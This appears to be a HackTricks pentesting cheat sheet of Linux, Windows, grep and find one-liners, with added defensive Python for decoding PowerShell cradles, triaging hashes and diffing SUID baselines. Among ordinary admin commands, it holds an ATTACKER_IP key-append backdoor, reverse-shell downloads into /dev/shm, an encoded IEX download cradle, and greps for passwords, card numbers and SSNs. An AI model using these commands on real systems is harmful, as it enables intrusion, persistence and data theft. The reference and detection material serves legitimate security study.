Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Common Bash
#Exfiltration using Base64
base64 -w 0 file

#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'

#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

#Echo without new line and Hex
echo -n -e "\x41"

#Count
wc -l <file> #Lines
wc -c <file> #Chars

#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates

#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file

#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py

#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by network processes
lsof -i4 #Files used by network IPv4 processes
lsof -i6 #Files used by network IPv6 processes
lsof -i4 -a -p 1234 #List all open IPv4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i:80 #Files used by network processes on port 80
fuser -v -n tcp 80

#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z x file.7z
sudo apt-get install xz-utils; unxz file.xz

#Add new user (the -p argument must be the hash, so the openssl call has to be command-substituted)
useradd -p "$(openssl passwd -1 '<Password>')" hacker

#Clipboard
xclip -sel c < file.txt

#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content

#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob

#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create /mnt/vhd first

# ssh-keyscan, helps to find out if 2 ssh ports belong to the same host by comparing keys
ssh-keyscan 10.10.10.101

# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate a CSR from a private key. Recommended to set the "Organization Name" (Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create a self-signed certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create the pkcs12 certificate format (firefox) from the signed certificate
# If you only need to create a client certificate from a CA certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12

# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh

#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz

#Count number of instructions executed by a program, needs a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"

#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null

#Reconfigure timezone
sudo dpkg-reconfigure tzdata

#Search which package a binary comes from
apt-file search /usr/bin/file #Needed: apt-get install apt-file

#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw

#Set immutable (not removable) bit
sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it

# List files inside zip
7z l file.zip
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
Bash for Windows
#Base64 for Windows
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0

#Exe compression
upx -9 nc.exe

#Exe2bat
wine exe2bat.exe nc.exe nc.txt

#Compile Windows python exploit to exe
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
pyinstaller --onefile exploit.py

#Compile for windows
#sudo apt-get install gcc-mingw-w64-i686
i686-w64-mingw32-gcc -o executable useradd.c
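The base64 one-liner above produces the form PowerShell's -EncodedCommand expects (UTF-16LE, then base64). On the defender's side the same transform has to be reversed when such a blob shows up in a process command line. This is an added example, not part of the cheat sheet: it decodes the blob and flags common download-cradle markers; the command-line and the marker list are constructed here.

```python
import base64
import re

# Strings typical of PowerShell download cradles, e.g. the one-liner encoded above.
CRADLE_MARKERS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient", "FromBase64String")

# -EncodedCommand and its abbreviations (-e, -ec, -enc), followed by the base64 blob.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script):
    """Same transform as `iconv --to-code UTF-16LE | base64 -w0`; used only to build test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob):
    """Reverse the transform: base64-decode, then UTF-16LE-decode. Raises ValueError on
    malformed base64 or an odd byte count (UTF-16 code units are 2 bytes each)."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("not UTF-16LE: odd number of bytes")
    return raw.decode("utf-16-le")


def analyze_cmdline(cmdline):
    """Inspect a process command line (e.g. from a Sysmon event 1 or auditd record): if it
    carries an encoded command, decode it and report which cradle markers appear in it.
    Returns None when there is nothing encoded to inspect."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        script = decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return {"script": None, "markers": [], "error": "undecodable payload"}
    lowered = script.lower()
    markers = [k for k in CRADLE_MARKERS if k.lower() in lowered]
    return {"script": script, "markers": markers, "error": None}


# Constructed sample: the page's own one-liner, encoded the way the page shows.
SAMPLE_SCRIPT = "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')"
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
    print(analyze_cmdline("powershell.exe -File maintenance.ps1"))
```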
Greps
Grep searches text files for a given pattern and prints the matching lines.
Example usage:
grep "pattern" file.txt
#Extract emails from file
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt

#Extract valid IP addresses
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt

#Extract passwords
grep -i "pwd\|passw" file.txt

#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt

# Extract hashes
#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
grep -E -o '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | grep -E -o '[a-fA-F0-9]{32}' > md5-hashes.txt

#Extract valid MySQL-Old hashes
grep -E -o "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt

#Extract blowfish (bcrypt) hashes
grep -E -o '\$2[aby]\$[0-9]{2}\$[./0-9A-Za-z]{53}' *.txt > blowfish-hashes.txt

#Extract Joomla hashes
grep -E -o "([0-9a-zA-Z]{32}):(\w{16,32})" *.txt > joomla.txt

#Extract VBulletin hashes
grep -E -o "([0-9a-zA-Z]{32}):(\S{3,32})" *.txt > vbulletin.txt

#Extract phpBB3-MD5
grep -E -o '\$H\$[./0-9A-Za-z]{31}' *.txt > phpBB3-md5.txt

#Extract Wordpress-MD5
grep -E -o '\$P\$[./0-9A-Za-z]{31}' *.txt > wordpress-md5.txt

#Extract Drupal 7
grep -E -o '\$S\$[./0-9A-Za-z]{52}' *.txt > drupal-7.txt

#Extract old Unix-md5 (salt may contain . and /)
grep -E -o '\$1\$[./0-9A-Za-z]{8}\$[./0-9A-Za-z]{22}' *.txt > md5-unix-old.txt

#Extract md5-apr1
grep -E -o '\$apr1\$[./0-9A-Za-z]{8}\$[./0-9A-Za-z]{22}' *.txt > md5-apr1.txt

#Extract sha512crypt, SHA512(Unix)
grep -E -o '\$6\$[./0-9A-Za-z]{8,16}\$[./0-9A-Za-z]{86}' *.txt > sha512crypt.txt

#Extract e-mails from text files (single quotes: "$*" would be expanded by the shell)
grep -E -o '\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+\.[a-zA-Z0-9.-]+\b' *.txt > e-mails.txt

#Extract HTTP URLs from text files
grep -shoP 'http.*?[" >]' *.txt > http-urls.txt
#For extracting HTTPS, FTP and other URL formats use
grep -E -o '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www\.[-a-z0-9.]+)[^ .,; >">):]' *.txt > urls.txt
#Note: if grep returns "Binary file (standard input) matches" use one of the following approaches
# cat *.log | tr '[\000-\011\013-\037\177-\377]' '.' | grep -E "Your_Regex"
# OR
# cat -v *.log | grep -E -o "Your_Regex"

#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*\.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt

# Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
#American Express
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
#Diners Club (non-capturing groups need -P)
grep -P -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
#Discover
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
#JCB
grep -P -o "\b(?:2131|1800|35\d{3})\d{11}\b" *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt

# Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txt
#Extract US Passport Cards
grep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txt
#Extract US Passport Number
grep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txt
#Extract US Phone Numbers
grep -P -o '\d{3}[\s_-]?\d{3}[\s_-]?\d{4}' *.txt > us-phones.txt
#Extract ISBN Numbers (lookaheads need -P)
grep -a -o -P "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
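The hash one-liners above are one grep per format. When triaging a dump (a leaked config, a log export, a repository) for credentials that need rotating, it is handier to run all the formats over the text in one pass and get each token labelled. This is an added example, not the cheat sheet's own code; the sample dump is constructed, and it includes a git commit id to show that a bare hex pattern cannot tell a digest from a password hash.

```python
import re

# One Python regex per hash format the grep one-liners target. Order is most specific
# first, so the hex digits inside a crypt-style string are not re-reported as md5/sha*.
HASH_PATTERNS = {
    "sha512crypt": re.compile(r"\$6\$[./0-9A-Za-z]{8,16}\$[./0-9A-Za-z]{86}"),
    "md5crypt": re.compile(r"\$1\$[./0-9A-Za-z]{8}\$[./0-9A-Za-z]{22}"),
    "apr1": re.compile(r"\$apr1\$[./0-9A-Za-z]{8}\$[./0-9A-Za-z]{22}"),
    "bcrypt": re.compile(r"\$2[aby]\$[0-9]{2}\$[./0-9A-Za-z]{53}"),
    "phpass": re.compile(r"\$[HP]\$[./0-9A-Za-z]{31}"),  # phpBB3 ($H$) and WordPress ($P$)
    "drupal7": re.compile(r"\$S\$[./0-9A-Za-z]{52}"),
    # Bare hex digests: the lookarounds reject hex runs longer than the digest itself.
    "sha512": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{128}(?![0-9a-fA-F])"),
    "sha256": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{64}(?![0-9a-fA-F])"),
    "sha1": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{40}(?![0-9a-fA-F])"),
    "md5": re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])"),
}


def find_hashes(text):
    """Return (format, token) pairs, in order of appearance, for every hash-looking
    token in text. A span already claimed by a more specific pattern is skipped."""
    found = []  # (start, end, format, token)
    for name, pat in HASH_PATTERNS.items():
        for m in pat.finditer(text):
            if any(s <= m.start() < e for s, e, _, _ in found):
                continue
            found.append((m.start(), m.end(), name, m.group(0)))
    found.sort()
    return [(name, token) for _, _, name, token in found]


# Constructed sample dump: a shadow-style line, a WordPress row, a git commit id
# (reported as sha1; triage such hits) and a 33-hex-digit decoy that must not match.
SAMPLE = (
    "alice:$6$AbCdEfGh$0123456789abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ./0123456789abcdefghijkl:19000:0:99999:7:::\n"
    "wp_users: $P$Babcdefghijklmnopqrstuvwxyz0123 admin\n"
    "commit da39a3ee5e6b4b0d3255bfef95601890afd80709 (not a password hash)\n"
    "legacy 5f4dcc3b5aa765d61d8327deb882cf99 decoy 5f4dcc3b5aa765d61d8327deb882cf99a\n"
)

if __name__ == "__main__":
    for fmt, token in find_hashes(SAMPLE):
        print(f"{fmt:12} {token}")
```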
Find
# Find SUID set files.
find / -perm /u=s -ls 2>/dev/null

# Find SGID set files.
find / -perm /g=s -ls 2>/dev/null

# Find readable directories and sort by time. (depth = 4)
find / -maxdepth 4 -type d -readable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Writable directory and sort by time. (depth = 10)find / -type d -maxdepth 10 -writable -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current User and sort by time. (depth = 10)find / -maxdepth 10 -user $(id -u) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Or Found Own by Current Group ID and Sort by time. (depth = 10)find / -maxdepth 10 -group $(id -g) -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r
# Found Newer files and sort by time. (depth = 5)find / -maxdepth 5 -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer files only and sort by time. (depth = 5)find / -maxdepth 5 -type f -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
# Found Newer directory only and sort by time. (depth = 5)find / -maxdepth 5 -type d -printf "%T@ %Tc | %p \n" 2>/dev/null | grep -v "| /proc" | grep -v "| /dev" | grep -v "| /run" | grep -v "| /var/log" | grep -v "| /boot" | grep -v "| /sys/" | sort -n -r | less
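The SUID/SGID listings above are a snapshot; what a defender usually wants is the difference from a known-good snapshot, because a newly appeared set-id binary is the finding. This is an added example, not the cheat sheet's own code: it walks a tree the way `find / -perm /u=s` does (skipping the same pseudo-filesystems), diffs the result against a saved baseline, and demonstrates itself on a constructed temporary tree.

```python
import os
import stat
import tempfile

PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")  # skipped, as the find one-liners do


def find_setid_files(root):
    """Return sorted (path, octal mode) for regular files under root with the SUID or
    SGID bit set: the population `find / -perm /u=s` and `-perm /g=s` list."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def diff_against_baseline(current, baseline_paths):
    """(added, removed): new set-id binaries are the ones to investigate; removed ones
    may mean the baseline itself is stale or was tampered with."""
    cur, base = {p for p, _ in current}, set(baseline_paths)
    return sorted(cur - base), sorted(base - cur)


def run_demo():
    """Constructed tree in a temp dir: one SUID file, one plain file, checked against
    a baseline that names a binary which no longer exists."""
    with tempfile.TemporaryDirectory() as root:
        suid, plain = os.path.join(root, "bin", "helper"), os.path.join(root, "bin", "tool")
        os.makedirs(os.path.dirname(suid))
        for p in (suid, plain):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(plain, 0o755)
        os.chmod(suid, 0o4755)  # setting SUID on a file we own needs no privilege
        current = find_setid_files(root)
        added, removed = diff_against_baseline(current, [os.path.join(root, "bin", "old")])
        rel = lambda p: os.path.relpath(p, root)
        return [rel(p) for p, _ in current], [rel(p) for p in added], [rel(p) for p in removed]


if __name__ == "__main__":
    print(run_demo())
```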
Nmap search help
#Nmap scripts ((default or version) and smb)
nmap --script-help "(default or version) and *smb*"
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
nmap --script-help "(default or version) and smb"
Bash
Bash stands for Bourne Again Shell and is the most widely used shell on Linux systems. It is used to run commands, manage scripts and interact with the system; its scripting language and the range of commands available from it make it popular with system administrators and security professionals.
#All bytes inside a file (except 0x20 and 0x00)
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
Iptables
#Delete current rules and chains
iptables --flush
iptables --delete-chain

#allow loopback
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

#drop ICMP
iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP
iptables -A OUTPUT -p icmp -j DROP

#allow established connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#allow ssh, http, https, dns
iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
#DNS replies are already admitted by the RELATED,ESTABLISHED rule above; an INPUT ACCEPT on
#"--sport 53" would let any host in just by sending from source port 53, so only the
#outbound queries need explicit rules
iptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT

#default policies
iptables -P INPUT DROP
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT